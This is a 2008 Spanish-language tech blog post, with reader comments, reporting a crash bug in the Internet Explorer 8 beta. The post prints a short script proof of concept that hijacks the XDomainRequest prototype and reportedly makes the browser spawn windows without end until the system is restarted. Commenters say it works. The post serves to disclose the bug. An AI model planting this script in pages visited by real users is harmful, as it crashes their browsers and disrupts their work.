Colgar Internet Explorer 8 fácilmente

Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una característica nueva que permiten las llamadas XML entre dominios. Este ataque es similar al de XMLHttpRequest, del año 2006. Internet Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, provocando así un ataque infinito, teniendo como […].

Antonio Paredes / 01.04.2008 / 3:22 pm

Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una característica nueva que permiten las llamadas XML entre dominios. Este ataque es similar al de XMLHttpRequest, del año 2006.

Internet Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, provocando así un ataque infinito, teniendo como única solución: reiniciar el sistema.

El ataque puede realizarse con el siguiente código:

<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>

Compartir noticia

Noticias relacionadas

Lo último en tecnología

← Recuperar datos en Mac

Demanda: ¿Apple nos estafa con sus pantallas? →

Enlaces Archivo / Condiciones

Comentarios sobre “Colgar Internet Explorer 8 fácilmente”

h@nz …el Geek:
abril 4, 2008 (9:53 am)
Menos mal que aún esta en Beta, sino, me preocuparía… :D

A ver, lanzamos una bombita de Firefox en Beta!??? :D

Saludos.
Anthony Paredes:
abril 2, 2008 (11:23 am)
@Manuel, lee aquí:
http://www.0x000000.com/?i=543

Te enterarás con más detalle, esa es mi fuente.
J.F.:
abril 2, 2008 (1:49 am)
Increíble, muy bueno.
Un saludo Anthony :P
Browser Killer:
abril 1, 2008 (3:58 pm)
Comprobado, funciona. Algunos están todavía en Explorer 6 y ustedes ya conocen errores del 8, buen ritmo, saludos!

Comenta este artículo Colgar Internet Explorer 8 fácilmente